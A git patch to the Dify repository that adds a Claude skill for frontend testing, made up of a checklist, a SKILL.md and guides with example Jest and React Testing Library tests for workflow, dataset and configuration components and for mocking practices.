From 61199663e7e5d746eab565b29cb1411180b343b9 Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Mon, 15 Dec 2025 10:05:48 +0800 Subject: [PATCH 01/68] chore: add anthropic skills for frontend testing (#29608) Signed-off-by: yyh Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> --- .claude/skills/frontend-testing/CHECKLIST.md | 205 +++++++ .claude/skills/frontend-testing/SKILL.md | 320 +++++++++++ .../frontend-testing/guides/async-testing.md | 345 ++++++++++++ .../guides/common-patterns.md | 449 +++++++++++++++ .../guides/domain-components.md | 523 ++++++++++++++++++ .../skills/frontend-testing/guides/mocking.md | 353 ++++++++++++ .../frontend-testing/guides/workflow.md | 269 +++++++++ .../templates/component-test.template.tsx | 289 ++++++++++ .../templates/hook-test.template.ts | 207 +++++++ .../templates/utility-test.template.ts | 154 ++++++ .github/workflows/autofix.yml | 3 +- web/testing/testing.md | 54 +- 12 files changed, 3166 insertions(+), 5 deletions(-) create mode 100644 .claude/skills/frontend-testing/CHECKLIST.md create mode 100644 .claude/skills/frontend-testing/SKILL.md create mode 100644 .claude/skills/frontend-testing/guides/async-testing.md create mode 100644 .claude/skills/frontend-testing/guides/common-patterns.md create mode 100644 .claude/skills/frontend-testing/guides/domain-components.md create mode 100644 .claude/skills/frontend-testing/guides/mocking.md create mode 100644 .claude/skills/frontend-testing/guides/workflow.md create mode 100644 .claude/skills/frontend-testing/templates/component-test.template.tsx create mode 100644 .claude/skills/frontend-testing/templates/hook-test.template.ts create mode 100644 .claude/skills/frontend-testing/templates/utility-test.template.ts diff --git a/.claude/skills/frontend-testing/CHECKLIST.md b/.claude/skills/frontend-testing/CHECKLIST.md new file mode 100644 index 0000000000..95e04aec3f --- /dev/null +++ b/.claude/skills/frontend-testing/CHECKLIST.md @@ -0,0 +1,205 @@ +# Test Generation Checklist + +Use this checklist when generating or reviewing tests for Dify frontend components. + +## Pre-Generation + +- [ ] Read the component source code completely +- [ ] Identify component type (component, hook, utility, page) +- [ ] Run `pnpm analyze-component ` if available +- [ ] Note complexity score and features detected +- [ ] Check for existing tests in the same directory +- [ ] **Identify ALL files in the directory** that need testing (not just index) + +## Testing Strategy + +### ⚠️ Incremental Workflow (CRITICAL for Multi-File) + +- [ ] **NEVER generate all tests at once** - process one file at a time +- [ ] Order files by complexity: utilities → hooks → simple → complex → integration +- [ ] Create a todo list to track progress before starting +- [ ] For EACH file: write → run test → verify pass → then next +- [ ] **DO NOT proceed** to next file until current one passes + +### Path-Level Coverage + +- [ ] **Test ALL files** in the assigned directory/path +- [ ] List all components, hooks, utilities that need coverage +- [ ] Decide: single spec file (integration) or multiple spec files (unit) + +### Complexity Assessment + +- [ ] Run `pnpm analyze-component ` for complexity score +- [ ] **Complexity > 50**: Consider refactoring before testing +- [ ] **500+ lines**: Consider splitting before testing +- [ ] **30-50 complexity**: Use multiple describe blocks, organized structure + +### Integration vs Mocking + +- [ ] **DO NOT mock base components** (`Loading`, `Button`, `Tooltip`, etc.) +- [ ] Import real project components instead of mocking +- [ ] Only mock: API calls, complex context providers, third-party libs with side effects +- [ ] Prefer integration testing when using single spec file + +## Required Test Sections + +### All Components MUST Have + +- [ ] **Rendering tests** - Component renders without crashing +- [ ] **Props tests** - Required props, optional props, default values +- [ ] **Edge cases** - null, undefined, empty values, boundaries + +### Conditional Sections (Add When Feature Present) + +| Feature | Add Tests For | +|---------|---------------| +| `useState` | Initial state, transitions, cleanup | +| `useEffect` | Execution, dependencies, cleanup | +| Event handlers | onClick, onChange, onSubmit, keyboard | +| API calls | Loading, success, error states | +| Routing | Navigation, params, query strings | +| `useCallback`/`useMemo` | Referential equality | +| Context | Provider values, consumer behavior | +| Forms | Validation, submission, error display | + +## Code Quality Checklist + +### Structure + +- [ ] Uses `describe` blocks to group related tests +- [ ] Test names follow `should when ` pattern +- [ ] AAA pattern (Arrange-Act-Assert) is clear +- [ ] Comments explain complex test scenarios + +### Mocks + +- [ ] **DO NOT mock base components** (`@/app/components/base/*`) +- [ ] `jest.clearAllMocks()` in `beforeEach` (not `afterEach`) +- [ ] Shared mock state reset in `beforeEach` +- [ ] i18n mock returns keys (not empty strings) +- [ ] Router mocks match actual Next.js API +- [ ] Mocks reflect actual component conditional behavior +- [ ] Only mock: API services, complex context providers, third-party libs + +### Queries + +- [ ] Prefer semantic queries (`getByRole`, `getByLabelText`) +- [ ] Use `queryBy*` for absence assertions +- [ ] Use `findBy*` for async elements +- [ ] `getByTestId` only as last resort + +### Async + +- [ ] All async tests use `async/await` +- [ ] `waitFor` wraps async assertions +- [ ] Fake timers properly setup/teardown +- [ ] No floating promises + +### TypeScript + +- [ ] No `any` types without justification +- [ ] Mock data uses actual types from source +- [ ] Factory functions have proper return types + +## Coverage Goals (Per File) + +For the current file being tested: + +- [ ] 100% function coverage +- [ ] 100% statement coverage +- [ ] >95% branch coverage +- [ ] >95% line coverage + +## Post-Generation (Per File) + +**Run these checks after EACH test file, not just at the end:** + +- [ ] Run `pnpm test -- path/to/file.spec.tsx` - **MUST PASS before next file** +- [ ] Fix any failures immediately +- [ ] Mark file as complete in todo list +- [ ] Only then proceed to next file + +### After All Files Complete + +- [ ] Run full directory test: `pnpm test -- path/to/directory/` +- [ ] Check coverage report: `pnpm test -- --coverage` +- [ ] Run `pnpm lint:fix` on all test files +- [ ] Run `pnpm type-check:tsgo` + +## Common Issues to Watch + +### False Positives + +```typescript +// ❌ Mock doesn't match actual behavior +jest.mock('./Component', () => () =>
Mocked
) + +// ✅ Mock matches actual conditional logic +jest.mock('./Component', () => ({ isOpen }: any) => + isOpen ?
Content
: null +) +``` + +### State Leakage + +```typescript +// ❌ Shared state not reset +let mockState = false +jest.mock('./useHook', () => () => mockState) + +// ✅ Reset in beforeEach +beforeEach(() => { + mockState = false +}) +``` + +### Async Race Conditions + +```typescript +// ❌ Not awaited +it('loads data', () => { + render() + expect(screen.getByText('Data')).toBeInTheDocument() +}) + +// ✅ Properly awaited +it('loads data', async () => { + render() + await waitFor(() => { + expect(screen.getByText('Data')).toBeInTheDocument() + }) +}) +``` + +### Missing Edge Cases + +Always test these scenarios: + +- `null` / `undefined` inputs +- Empty strings / arrays / objects +- Boundary values (0, -1, MAX_INT) +- Error states +- Loading states +- Disabled states + +## Quick Commands + +```bash +# Run specific test +pnpm test -- path/to/file.spec.tsx + +# Run with coverage +pnpm test -- --coverage path/to/file.spec.tsx + +# Watch mode +pnpm test -- --watch path/to/file.spec.tsx + +# Update snapshots (use sparingly) +pnpm test -- -u path/to/file.spec.tsx + +# Analyze component +pnpm analyze-component path/to/component.tsx + +# Review existing test +pnpm analyze-component path/to/component.tsx --review +``` diff --git a/.claude/skills/frontend-testing/SKILL.md b/.claude/skills/frontend-testing/SKILL.md new file mode 100644 index 0000000000..dac604ac4b --- /dev/null +++ b/.claude/skills/frontend-testing/SKILL.md @@ -0,0 +1,320 @@ +--- +name: Dify Frontend Testing +description: Generate Jest + React Testing Library tests for Dify frontend components, hooks, and utilities. Triggers on testing, spec files, coverage, Jest, RTL, unit tests, integration tests, or write/review test requests. +--- + +# Dify Frontend Testing Skill + +This skill enables Claude to generate high-quality, comprehensive frontend tests for the Dify project following established conventions and best practices. + +> **⚠️ Authoritative Source**: This skill is derived from `web/testing/testing.md`. When in doubt, always refer to that document as the canonical specification. + +## When to Apply This Skill + +Apply this skill when the user: + +- Asks to **write tests** for a component, hook, or utility +- Asks to **review existing tests** for completeness +- Mentions **Jest**, **React Testing Library**, **RTL**, or **spec files** +- Requests **test coverage** improvement +- Uses `pnpm analyze-component` output as context +- Mentions **testing**, **unit tests**, or **integration tests** for frontend code +- Wants to understand **testing patterns** in the Dify codebase + +**Do NOT apply** when: + +- User is asking about backend/API tests (Python/pytest) +- User is asking about E2E tests (Playwright/Cypress) +- User is only asking conceptual questions without code context + +## Quick Reference + +### Tech Stack + +| Tool | Version | Purpose | +|------|---------|---------| +| Jest | 29.7 | Test runner | +| React Testing Library | 16.0 | Component testing | +| happy-dom | - | Test environment | +| nock | 14.0 | HTTP mocking | +| TypeScript | 5.x | Type safety | + +### Key Commands + +```bash +# Run all tests +pnpm test + +# Watch mode +pnpm test -- --watch + +# Run specific file +pnpm test -- path/to/file.spec.tsx + +# Generate coverage report +pnpm test -- --coverage + +# Analyze component complexity +pnpm analyze-component + +# Review existing test +pnpm analyze-component --review +``` + +### File Naming + +- Test files: `ComponentName.spec.tsx` (same directory as component) +- Integration tests: `web/__tests__/` directory + +## Test Structure Template + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import Component from './index' + +// ✅ Import real project components (DO NOT mock these) +// import Loading from '@/app/components/base/loading' +// import { ChildComponent } from './child-component' + +// ✅ Mock external dependencies only +jest.mock('@/service/api') +jest.mock('next/navigation', () => ({ + useRouter: () => ({ push: jest.fn() }), + usePathname: () => '/test', +})) + +// Shared state for mocks (if needed) +let mockSharedState = false + +describe('ComponentName', () => { + beforeEach(() => { + jest.clearAllMocks() // ✅ Reset mocks BEFORE each test + mockSharedState = false // ✅ Reset shared state + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange + const props = { title: 'Test' } + + // Act + render() + + // Assert + expect(screen.getByText('Test')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should apply custom className', () => { + render() + expect(screen.getByRole('button')).toHaveClass('custom') + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should handle click events', () => { + const handleClick = jest.fn() + render() + + fireEvent.click(screen.getByRole('button')) + + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle null data', () => { + render() + expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + render() + expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + }) +}) +``` + +## Testing Workflow (CRITICAL) + +### ⚠️ Incremental Approach Required + +**NEVER generate all test files at once.** For complex components or multi-file directories: + +1. **Analyze & Plan**: List all files, order by complexity (simple → complex) +1. **Process ONE at a time**: Write test → Run test → Fix if needed → Next +1. **Verify before proceeding**: Do NOT continue to next file until current passes + +``` +For each file: + ┌────────────────────────────────────────┐ + │ 1. Write test │ + │ 2. Run: pnpm test -- .spec.tsx │ + │ 3. PASS? → Mark complete, next file │ + │ FAIL? → Fix first, then continue │ + └────────────────────────────────────────┘ +``` + +### Complexity-Based Order + +Process in this order for multi-file testing: + +1. 🟢 Utility functions (simplest) +1. 🟢 Custom hooks +1. 🟡 Simple components (presentational) +1. 🟡 Medium components (state, effects) +1. 🔴 Complex components (API, routing) +1. 🔴 Integration tests (index files - last) + +### When to Refactor First + +- **Complexity > 50**: Break into smaller pieces before testing +- **500+ lines**: Consider splitting before testing +- **Many dependencies**: Extract logic into hooks first + +> 📖 See `guides/workflow.md` for complete workflow details and todo list format. + +## Testing Strategy + +### Path-Level Testing (Directory Testing) + +When assigned to test a directory/path, test **ALL content** within that path: + +- Test all components, hooks, utilities in the directory (not just `index` file) +- Use incremental approach: one file at a time, verify each before proceeding +- Goal: 100% coverage of ALL files in the directory + +### Integration Testing First + +**Prefer integration testing** when writing tests for a directory: + +- ✅ **Import real project components** directly (including base components and siblings) +- ✅ **Only mock**: API services (`@/service/*`), `next/navigation`, complex context providers +- ❌ **DO NOT mock** base components (`@/app/components/base/*`) +- ❌ **DO NOT mock** sibling/child components in the same directory + +> See [Test Structure Template](#test-structure-template) for correct import/mock patterns. + +## Core Principles + +### 1. AAA Pattern (Arrange-Act-Assert) + +Every test should clearly separate: + +- **Arrange**: Setup test data and render component +- **Act**: Perform user actions +- **Assert**: Verify expected outcomes + +### 2. Black-Box Testing + +- Test observable behavior, not implementation details +- Use semantic queries (getByRole, getByLabelText) +- Avoid testing internal state directly +- **Prefer pattern matching over hardcoded strings** in assertions: + +```typescript +// ❌ Avoid: hardcoded text assertions +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Better: role-based queries +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Better: pattern matching +expect(screen.getByText(/loading/i)).toBeInTheDocument() +``` + +### 3. Single Behavior Per Test + +Each test verifies ONE user-observable behavior: + +```typescript +// ✅ Good: One behavior +it('should disable button when loading', () => { + render( + + + ) + + // Focus should cycle within modal + await user.tab() + expect(screen.getByText('First')).toHaveFocus() + + await user.tab() + expect(screen.getByText('Second')).toHaveFocus() + + await user.tab() + expect(screen.getByText('First')).toHaveFocus() // Cycles back + }) +}) +``` + +## Form Testing + +```typescript +describe('LoginForm', () => { + it('should submit valid form', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn() + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(onSubmit).toHaveBeenCalledWith({ + email: 'test@example.com', + password: 'password123', + }) + }) + + it('should show validation errors', async () => { + const user = userEvent.setup() + + render() + + // Submit empty form + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/email is required/i)).toBeInTheDocument() + expect(screen.getByText(/password is required/i)).toBeInTheDocument() + }) + + it('should validate email format', async () => { + const user = userEvent.setup() + + render() + + await user.type(screen.getByLabelText(/email/i), 'invalid-email') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/invalid email/i)).toBeInTheDocument() + }) + + it('should disable submit button while submitting', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn(() => new Promise(resolve => setTimeout(resolve, 100))) + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByRole('button', { name: /signing in/i })).toBeDisabled() + + await waitFor(() => { + expect(screen.getByRole('button', { name: /sign in/i })).toBeEnabled() + }) + }) +}) +``` + +## Data-Driven Tests with test.each + +```typescript +describe('StatusBadge', () => { + test.each([ + ['success', 'bg-green-500'], + ['warning', 'bg-yellow-500'], + ['error', 'bg-red-500'], + ['info', 'bg-blue-500'], + ])('should apply correct class for %s status', (status, expectedClass) => { + render() + + expect(screen.getByTestId('status-badge')).toHaveClass(expectedClass) + }) + + test.each([ + { input: null, expected: 'Unknown' }, + { input: undefined, expected: 'Unknown' }, + { input: '', expected: 'Unknown' }, + { input: 'invalid', expected: 'Unknown' }, + ])('should show "Unknown" for invalid input: $input', ({ input, expected }) => { + render() + + expect(screen.getByText(expected)).toBeInTheDocument() + }) +}) +``` + +## Debugging Tips + +```typescript +// Print entire DOM +screen.debug() + +// Print specific element +screen.debug(screen.getByRole('button')) + +// Log testing playground URL +screen.logTestingPlaygroundURL() + +// Pretty print DOM +import { prettyDOM } from '@testing-library/react' +console.log(prettyDOM(screen.getByRole('dialog'))) + +// Check available roles +import { getRoles } from '@testing-library/react' +console.log(getRoles(container)) +``` + +## Common Mistakes to Avoid + +### ❌ Don't Use Implementation Details + +```typescript +// Bad - testing implementation +expect(component.state.isOpen).toBe(true) +expect(wrapper.find('.internal-class').length).toBe(1) + +// Good - testing behavior +expect(screen.getByRole('dialog')).toBeInTheDocument() +``` + +### ❌ Don't Forget Cleanup + +```typescript +// Bad - may leak state between tests +it('test 1', () => { + render() +}) + +// Good - cleanup is automatic with RTL, but reset mocks +beforeEach(() => { + jest.clearAllMocks() +}) +``` + +### ❌ Don't Use Exact String Matching (Prefer Black-Box Assertions) + +```typescript +// ❌ Bad - hardcoded strings are brittle +expect(screen.getByText('Submit Form')).toBeInTheDocument() +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Good - role-based queries (most semantic) +expect(screen.getByRole('button', { name: /submit/i })).toBeInTheDocument() +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Good - pattern matching (flexible) +expect(screen.getByText(/submit/i)).toBeInTheDocument() +expect(screen.getByText(/loading/i)).toBeInTheDocument() + +// ✅ Good - test behavior, not exact UI text +expect(screen.getByRole('button')).toBeDisabled() +expect(screen.getByRole('alert')).toBeInTheDocument() +``` + +**Why prefer black-box assertions?** + +- Text content may change (i18n, copy updates) +- Role-based queries test accessibility +- Pattern matching is resilient to minor changes +- Tests focus on behavior, not implementation details + +### ❌ Don't Assert on Absence Without Query + +```typescript +// Bad - throws if not found +expect(screen.getByText('Error')).not.toBeInTheDocument() // Error! + +// Good - use queryBy for absence assertions +expect(screen.queryByText('Error')).not.toBeInTheDocument() +``` diff --git a/.claude/skills/frontend-testing/guides/domain-components.md b/.claude/skills/frontend-testing/guides/domain-components.md new file mode 100644 index 0000000000..ed2cc6eb8a --- /dev/null +++ b/.claude/skills/frontend-testing/guides/domain-components.md @@ -0,0 +1,523 @@ +# Domain-Specific Component Testing + +This guide covers testing patterns for Dify's domain-specific components. + +## Workflow Components (`workflow/`) + +Workflow components handle node configuration, data flow, and graph operations. + +### Key Test Areas + +1. **Node Configuration** +1. **Data Validation** +1. **Variable Passing** +1. **Edge Connections** +1. **Error Handling** + +### Example: Node Configuration Panel + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import NodeConfigPanel from './node-config-panel' +import { createMockNode, createMockWorkflowContext } from '@/__mocks__/workflow' + +// Mock workflow context +jest.mock('@/app/components/workflow/hooks', () => ({ + useWorkflowStore: () => mockWorkflowStore, + useNodesInteractions: () => mockNodesInteractions, +})) + +let mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), +} + +let mockNodesInteractions = { + handleNodeSelect: jest.fn(), + handleNodeDelete: jest.fn(), +} + +describe('NodeConfigPanel', () => { + beforeEach(() => { + jest.clearAllMocks() + mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), + } + }) + + describe('Node Configuration', () => { + it('should render node type selector', () => { + const node = createMockNode({ type: 'llm' }) + render() + + expect(screen.getByLabelText(/model/i)).toBeInTheDocument() + }) + + it('should update node config on change', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + await user.selectOptions(screen.getByLabelText(/model/i), 'gpt-4') + + expect(mockWorkflowStore.updateNode).toHaveBeenCalledWith( + node.id, + expect.objectContaining({ model: 'gpt-4' }) + ) + }) + }) + + describe('Data Validation', () => { + it('should show error for invalid input', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'code' }) + + render() + + // Enter invalid code + const codeInput = screen.getByLabelText(/code/i) + await user.clear(codeInput) + await user.type(codeInput, 'invalid syntax {{{') + + await waitFor(() => { + expect(screen.getByText(/syntax error/i)).toBeInTheDocument() + }) + }) + + it('should validate required fields', async () => { + const node = createMockNode({ type: 'http', data: { url: '' } }) + + render() + + fireEvent.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/url is required/i)).toBeInTheDocument() + }) + }) + }) + + describe('Variable Passing', () => { + it('should display available variables from upstream nodes', () => { + const upstreamNode = createMockNode({ + id: 'node-1', + type: 'start', + data: { outputs: [{ name: 'user_input', type: 'string' }] }, + }) + const currentNode = createMockNode({ + id: 'node-2', + type: 'llm', + }) + + mockWorkflowStore.nodes = [upstreamNode, currentNode] + mockWorkflowStore.edges = [{ source: 'node-1', target: 'node-2' }] + + render() + + // Variable selector should show upstream variables + fireEvent.click(screen.getByRole('button', { name: /add variable/i })) + + expect(screen.getByText('user_input')).toBeInTheDocument() + }) + + it('should insert variable into prompt template', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + // Click variable button + await user.click(screen.getByRole('button', { name: /insert variable/i })) + await user.click(screen.getByText('user_input')) + + const promptInput = screen.getByLabelText(/prompt/i) + expect(promptInput).toHaveValue(expect.stringContaining('{{user_input}}')) + }) + }) +}) +``` + +## Dataset Components (`dataset/`) + +Dataset components handle file uploads, data display, and search/filter operations. + +### Key Test Areas + +1. **File Upload** +1. **File Type Validation** +1. **Pagination** +1. **Search & Filtering** +1. **Data Format Handling** + +### Example: Document Uploader + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DocumentUploader from './document-uploader' + +jest.mock('@/service/datasets', () => ({ + uploadDocument: jest.fn(), + parseDocument: jest.fn(), +})) + +import * as datasetService from '@/service/datasets' +const mockedService = datasetService as jest.Mocked + +describe('DocumentUploader', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('File Upload', () => { + it('should accept valid file types', async () => { + const user = userEvent.setup() + const onUpload = jest.fn() + mockedService.uploadDocument.mockResolvedValue({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + await waitFor(() => { + expect(mockedService.uploadDocument).toHaveBeenCalledWith( + expect.any(FormData) + ) + }) + }) + + it('should reject invalid file types', async () => { + const user = userEvent.setup() + + render() + + const file = new File(['content'], 'test.exe', { type: 'application/x-msdownload' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + expect(screen.getByText(/unsupported file type/i)).toBeInTheDocument() + expect(mockedService.uploadDocument).not.toHaveBeenCalled() + }) + + it('should show upload progress', async () => { + const user = userEvent.setup() + + // Mock upload with progress + mockedService.uploadDocument.mockImplementation(() => { + return new Promise((resolve) => { + setTimeout(() => resolve({ id: 'doc-1' }), 100) + }) + }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + expect(screen.getByRole('progressbar')).toBeInTheDocument() + + await waitFor(() => { + expect(screen.queryByRole('progressbar')).not.toBeInTheDocument() + }) + }) + }) + + describe('Error Handling', () => { + it('should handle upload failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument.mockRejectedValue(new Error('Upload failed')) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByText(/upload failed/i)).toBeInTheDocument() + }) + }) + + it('should allow retry after failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument + .mockRejectedValueOnce(new Error('Network error')) + .mockResolvedValueOnce({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByRole('button', { name: /retry/i })).toBeInTheDocument() + }) + + await user.click(screen.getByRole('button', { name: /retry/i })) + + await waitFor(() => { + expect(screen.getByText(/uploaded successfully/i)).toBeInTheDocument() + }) + }) + }) +}) +``` + +### Example: Document List with Pagination + +```typescript +describe('DocumentList', () => { + describe('Pagination', () => { + it('should load first page on mount', async () => { + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + expect(mockedService.getDocuments).toHaveBeenCalledWith('ds-1', { page: 1 }) + }) + + it('should navigate to next page', async () => { + const user = userEvent.setup() + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '11', name: 'Doc 11' }], + total: 50, + page: 2, + pageSize: 10, + }) + + await user.click(screen.getByRole('button', { name: /next/i })) + + await waitFor(() => { + expect(screen.getByText('Doc 11')).toBeInTheDocument() + }) + }) + }) + + describe('Search & Filtering', () => { + it('should filter by search query', async () => { + const user = userEvent.setup() + jest.useFakeTimers() + + render() + + await user.type(screen.getByPlaceholderText(/search/i), 'test query') + + // Debounce + jest.advanceTimersByTime(300) + + await waitFor(() => { + expect(mockedService.getDocuments).toHaveBeenCalledWith( + 'ds-1', + expect.objectContaining({ search: 'test query' }) + ) + }) + + jest.useRealTimers() + }) + }) +}) +``` + +## Configuration Components (`app/configuration/`, `config/`) + +Configuration components handle forms, validation, and data persistence. + +### Key Test Areas + +1. **Form Validation** +1. **Save/Reset** +1. **Required vs Optional Fields** +1. **Configuration Persistence** +1. **Error Feedback** + +### Example: App Configuration Form + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import AppConfigForm from './app-config-form' + +jest.mock('@/service/apps', () => ({ + updateAppConfig: jest.fn(), + getAppConfig: jest.fn(), +})) + +import * as appService from '@/service/apps' +const mockedService = appService as jest.Mocked + +describe('AppConfigForm', () => { + const defaultConfig = { + name: 'My App', + description: '', + icon: 'default', + openingStatement: '', + } + + beforeEach(() => { + jest.clearAllMocks() + mockedService.getAppConfig.mockResolvedValue(defaultConfig) + }) + + describe('Form Validation', () => { + it('should require app name', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Clear name field + await user.clear(screen.getByLabelText(/name/i)) + await user.click(screen.getByRole('button', { name: /save/i })) + + expect(screen.getByText(/name is required/i)).toBeInTheDocument() + expect(mockedService.updateAppConfig).not.toHaveBeenCalled() + }) + + it('should validate name length', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toBeInTheDocument() + }) + + // Enter very long name + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'a'.repeat(101)) + + expect(screen.getByText(/name must be less than 100 characters/i)).toBeInTheDocument() + }) + + it('should allow empty optional fields', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Leave description empty (optional) + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalled() + }) + }) + }) + + describe('Save/Reset Functionality', () => { + it('should save configuration', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Updated App') + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalledWith( + 'app-1', + expect.objectContaining({ name: 'Updated App' }) + ) + }) + + expect(screen.getByText(/saved successfully/i)).toBeInTheDocument() + }) + + it('should reset to default values', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Changed Name') + + // Reset + await user.click(screen.getByRole('button', { name: /reset/i })) + + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + it('should show unsaved changes warning', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.type(screen.getByLabelText(/name/i), ' Updated') + + expect(screen.getByText(/unsaved changes/i)).toBeInTheDocument() + }) + }) + + describe('Error Handling', () => { + it('should show error on save failure', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockRejectedValue(new Error('Server error')) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/failed to save/i)).toBeInTheDocument() + }) + }) + }) +}) +``` diff --git a/.claude/skills/frontend-testing/guides/mocking.md b/.claude/skills/frontend-testing/guides/mocking.md new file mode 100644 index 0000000000..6b2c517cb6 --- /dev/null +++ b/.claude/skills/frontend-testing/guides/mocking.md @@ -0,0 +1,353 @@ +# Mocking Guide for Dify Frontend Tests + +## ⚠️ Important: What NOT to Mock + +### DO NOT Mock Base Components + +**Never mock components from `@/app/components/base/`** such as: + +- `Loading`, `Spinner` +- `Button`, `Input`, `Select` +- `Tooltip`, `Modal`, `Dropdown` +- `Icon`, `Badge`, `Tag` + +**Why?** + +- Base components will have their own dedicated tests +- Mocking them creates false positives (tests pass but real integration fails) +- Using real components tests actual integration behavior + +```typescript +// ❌ WRONG: Don't mock base components +jest.mock('@/app/components/base/loading', () => () =>
Loading
) +jest.mock('@/app/components/base/button', () => ({ children }: any) => ) + +// ✅ CORRECT: Import and use real base components +import Loading from '@/app/components/base/loading' +import Button from '@/app/components/base/button' +// They will render normally in tests +``` + +### What TO Mock + +Only mock these categories: + +1. **API services** (`@/service/*`) - Network calls +1. **Complex context providers** - When setup is too difficult +1. **Third-party libraries with side effects** - `next/navigation`, external SDKs +1. **i18n** - Always mock to return keys + +## Mock Placement + +| Location | Purpose | +|----------|---------| +| `web/__mocks__/` | Reusable mocks shared across multiple test files | +| Test file | Test-specific mocks, inline with `jest.mock()` | + +## Essential Mocks + +### 1. i18n (Always Required) + +```typescript +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) +``` + +### 2. Next.js Router + +```typescript +const mockPush = jest.fn() +const mockReplace = jest.fn() + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + replace: mockReplace, + back: jest.fn(), + prefetch: jest.fn(), + }), + usePathname: () => '/current-path', + useSearchParams: () => new URLSearchParams('?key=value'), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should navigate on click', () => { + render() + fireEvent.click(screen.getByRole('button')) + expect(mockPush).toHaveBeenCalledWith('/expected-path') 